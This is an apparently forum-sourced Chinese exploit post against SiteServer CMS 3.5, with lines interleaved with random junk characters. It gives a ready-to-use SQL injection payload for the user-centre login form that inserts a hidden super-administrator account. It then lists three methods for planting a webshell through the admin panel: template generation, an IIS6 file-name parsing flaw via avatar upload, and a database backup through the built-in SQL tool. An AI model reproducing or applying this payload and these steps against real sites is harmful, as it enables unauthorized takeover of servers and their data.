经测试秒杀最新的3.5版
$ Q" e7 |- d9 s( s. g' Y$ W6 k7 N5 d8 E+ C X
stieserver官网:www.siteserver.cn o9 v/ x Z( s5 `6 Q. ~( Y7 W
* v6 p! x) o) @5 z . e4 H! o7 Y8 I* P( a5 c4 Z
8 P5 H; a7 `# }8 M# ]
EXP:" r2 M: W% C8 L9 M8 x: f+ u
% k9 S0 x. T4 O, z0 S6 t
直接访问UserCenter/login.aspx
0 j I1 P4 n3 |# K- a# K/ }! F/ h+ E# p" [& r2 `: y$ _
& B; r# ~# H: C2 Y, `
3 E7 H! o& f5 n% d1 e# |, H9 Q8 H
用户名处输入:8 V1 T0 H" t( j; h5 u
, O, B; b" K& L123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--1 d5 }( E1 r% q5 H9 X0 }
. Q/ g. M3 v5 F4 N& ]
4 c2 _. b2 z5 |& l& H$ G$ f
& r& E& l9 g1 D$ ]* W& e* t密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。( ~4 F: w6 ~1 }; A' Y* C! F
8 a% }. x7 D" o% }9 Y
6 S Y2 m6 Q- j- Q" U; m' U
# E, X/ z$ q2 a8 v, N* I0 f1 q# S( |之后再访问后台SiteServer/login.aspx用插入的用户登陆% L! d+ |1 x* r! u" o+ V% R
5 s9 C5 T2 K% w
" z6 x) n9 W* Q1 i( q
: O" a% y+ s3 Q2 U) }后台拿webshell的三种方法:3 v+ i5 e+ n; P, _6 X* y' M
* v+ U! e& ^" i一、
* n2 M/ ], p* V$ E8 f, `5 b; p) ?: H) r
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
4 N0 h( ] ]8 q m/ h
) h0 _' c3 ?& e; Z- @0 `二、
- {3 Y2 y: l5 C: ]# B
% {7 U. b4 [& A- c9 { _成员权限-》添加用户-》用户名为:1.asp% S- R& Y1 V f7 v
( B3 G- }' d: Y2 s* Q( ^1 ahttp://127.0.0.1/usercenter/; b0 |1 c; c+ b& f' y
: {4 K5 V- \" [8 `用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
- n) u3 v% |7 Q {4 w* K8 G/ w& {
$ |7 _9 f( J1 g3 \( Q2 _% N(ps:后台添加用户时不会验证是否含有非法字符)" i8 k7 Q* r& W3 k1 w# b' [
) N9 Z7 h$ \" P) S. [ y& z三、3 l$ a4 o( z/ x$ a$ U8 [
0 A) t7 h; e1 a2 T
系统工具-》实用工具-》机器参数查看7 W* w7 @" D* u
可以看到数据库类型、名称,WEB路径- E' a8 f, g- h2 c$ r; r- l* d
9 X- A3 b6 v0 V( w6 J6 Z& L( l
系统工具-》数据库工具-》SQL语句查询
# ]0 D$ |1 b# h% t2 c这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
1 [ Q( P5 _- f5 v
5 \4 |/ \ p; a& O# W& w |